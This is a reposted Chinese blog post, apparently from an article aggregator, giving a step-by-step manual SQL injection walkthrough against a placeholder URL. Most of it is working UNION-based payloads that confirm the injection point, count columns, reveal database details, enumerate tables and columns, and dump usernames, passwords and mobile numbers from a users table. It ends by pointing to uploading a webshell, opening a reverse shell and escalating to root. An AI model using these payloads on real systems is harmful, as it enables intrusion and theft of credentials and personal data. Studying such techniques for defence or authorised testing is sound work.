SQL注入滲透實戰 - 碼上快樂

相關內容簡體繁體

SQL注入滲透實戰

本文轉載自查看原文 2019-04-24 09:00 897 SQLmap/ Penetration Testing

概述：

判斷注入點：

http://www.xxxxx.com/page.php?pid=42 and 1=1 #true

http://www.xxxxx.com/page.php?pid=42 and 1=2 #false

猜表的列數

http://www.xxxxx.com/page.php?pid=42 +ORDER+BY+06 #true

http://www.xxxxx.com/page.php?pid=42 +ORDER+BY+07 #false

爆出字段

http://www.xxxxx.com/page.php?pid=-42 +UNION+ALL+SELECT+1,2,3,4,5,6

爆當數據庫信息

http://www.xxxxx.com/page.php?pid=-42 +UNION+ALL+SELECT+1,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),3,4,5,6

猜解表

http://www.xxxxx.com/page.php?pid=-42 +UNION+ALL+SELECT+1,(SELECT+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()),3,4,5,6

猜解表的字段

http://www.xxxxx.com/page.php?pid=-42 +UNION+ALL+SELECT+1,(SELECT+GROUP_CONCAT(column_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x74626c5f7573657273),3,4,5,6

獲取字段數據

username,pass,mobile

http://www.xxxxx.com/page.php?pid=-42 +UNION+ALL+SELECT+1,(SELECT+GROUP_CONCAT(username,0x23,pass,0x23,mobile+SEPARATOR+0x3c62723e)+FROM+tbl_users),3,4,5,6

完結，后續就是找到后台，嘗試上傳webshell，反彈shell，提權root一系列的操作了。

免責聲明！

本站轉載的文章為個人學習借鑒使用，本站對版權不負任何法律責任。如果侵犯了您的隱私權益，請聯系本站郵箱yoyou2525@163.com刪除。

猜您在找 滲透測試基礎之sql注入 sql注入->提權->滲透滲透測試初學者的靶場實戰 1--墨者學院SQL注入—布爾盲注實戰SQL注入 web安全測試&滲透測試之sql注入~~ 滲透常用SQL注入語句大全滲透測試---SQL注入~sqllibs過濾關卡 sql注入實戰篇【滲透測試學習平台】 web for pentester -2.SQL注入【滲透課程】第五篇-SQL注入的原理

粵ICP備18138465號 © 2018-2025 CODEPRJ.COM